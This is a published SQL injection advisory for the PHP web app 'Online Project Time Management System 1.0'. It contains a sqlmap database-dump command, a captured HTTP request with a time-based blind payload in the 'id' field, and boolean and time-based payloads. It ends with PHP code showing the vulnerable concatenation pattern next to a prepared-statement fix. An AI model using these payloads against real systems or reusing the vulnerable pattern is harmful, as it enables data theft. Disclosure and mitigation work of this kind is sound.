Online Project Time Management System 1.0 – SQLi (Authenticated)

  • Author: Felipe Alcantara
    Date: 2022-01-25
  • Source: https://www.exploit-db.com/exploits/50682/
    # Exploit Title: Online Project Time Management System 1.0 - SQLi (Authenticated)
    # Date: 19/01/2022
    # Exploit Author: Felipe Alcantara (Filiplain)
    # Vendor Homepage: https://www.sourcecodester.com/
    # Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html
    # Version: 1.0
    # Tested on: Kali Linux
    
    # Steps to reproduce
    # Log in as an employee
    # Go to: http://localhost/ptms/?page=user
    # Click Update
    # Save request in BurpSuite
    # Run saved request with sqlmap: sqlmap -r request.txt --batch --risk 3 --level 3 --dump
    
    ==========================
    POST /ptms/classes/Users.php?f=save_employee HTTP/1.1
    Host: localhost
    Content-Length: 1362
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary39q8yel1pdwYRLNz
    Origin: http://localhost
    Referer: http://localhost/ptms/?page=user
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
    Connection: close
    
    
    ------WebKitFormBoundary39q8yel1pdwYRLNz
    Content-Disposition: form-data; name="id"
    
    4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test
    ------WebKitFormBoundary39q8yel1pdwYRLNz
    Content-Disposition: form-data; name="code"
    
    2022-0003
    ------WebKitFormBoundary39q8yel1pdwYRLNz
    Content-Disposition: form-data; name="generated_password"
    
    
    ------WebKitFormBoundary39q8yel1pdwYRLNz
    Content-Disposition: form-data; name="firstname"
    
    Mark 2223
    ------WebKitFormBoundary39q8yel1pdwYRLNz
    Content-Disposition: form-data; name="middlename"
    
    Z
    ------WebKitFormBoundary39q8yel1pdwYRLNz
    Content-Disposition: form-data; name="lastname"
    
    Cooper
    ------WebKitFormBoundary39q8yel1pdwYRLNz
    Content-Disposition: form-data; name="gender"
    
    Male
    ------WebKitFormBoundary39q8yel1pdwYRLNz
    Content-Disposition: form-data; name="department"
    
    IT Department
    ------WebKitFormBoundary39q8yel1pdwYRLNz
    Content-Disposition: form-data; name="position"
    
    Department Manager
    ------WebKitFormBoundary39q8yel1pdwYRLNz
    Content-Disposition: form-data; name="email"
    
    mcooper@sample.com
    ------WebKitFormBoundary39q8yel1pdwYRLNz
    Content-Disposition: form-data; name="password"
    
    
    ------WebKitFormBoundary39q8yel1pdwYRLNz
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundary39q8yel1pdwYRLNz--
    
    
    
    
    ==========================
    
    # Payloads
    # ++++++++++++
    # Payload: (Boolean-based blind)
    
    # ------WebKitFormBoundary39q8yel1pdwYRLNz
    # Content-Disposition: form-data; name="id"
    
    # 4' or 1=1 --
    
    # --------
    
    # Payload: (Time-based blind)
    
    # ------WebKitFormBoundary39q8yel1pdwYRLNz
    # Content-Disposition: form-data; name="id"
    
    # 4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test
    
    # -------
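Mitigation for the `id` field of `Users.php?f=save_employee`, as an added example that is not the project's own code: the string-interpolation pattern that produces this class of injection (assumed, since the project's actual handler is not reproduced on the page) next to a hardened handler that validates `id` as a positive integer and binds every value through a prepared statement. The table and column names (`users`, `firstname`) are assumptions for illustration.

```php
<?php
// Added example, not the project's code. Shows why the multipart `id`
// field becomes SQL in the vulnerable pattern and how the hardened
// handler keeps user data out of the query text entirely.

/** Vulnerable pattern (assumed): user input is concatenated into the SQL. */
function vulnerable_save_employee(mysqli $db, array $post): bool
{
    // A value such as "4' AND ... -- " terminates the string literal and
    // the rest of the field is executed as SQL, which is the bug on the page.
    $sql = "UPDATE users SET firstname = '{$post['firstname']}' "
         . "WHERE id = '{$post['id']}'";
    return $db->query($sql) !== false;
}

/** Returns the id as an int, or null if it is not a positive integer. */
function validate_employee_id($raw): ?int
{
    // FILTER_VALIDATE_INT rejects anything that is not a plain integer,
    // so quotes, comment markers and SQL keywords never reach the query.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Hardened handler: validation first, then typed parameter binding. */
function hardened_save_employee(mysqli $db, array $post): bool
{
    $id = validate_employee_id($post['id'] ?? null);
    if ($id === null) {
        http_response_code(400);   // reject the request instead of querying
        return false;
    }
    $firstname = (string) ($post['firstname'] ?? '');

    // Placeholders: the SQL text is fixed, data travels separately.
    $stmt = $db->prepare('UPDATE users SET firstname = ? WHERE id = ?');
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('si', $firstname, $id);  // 's' string, 'i' integer
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}
```

With the hardened handler, both payloads on this page fail the integer check and are answered with HTTP 400 before any query runs.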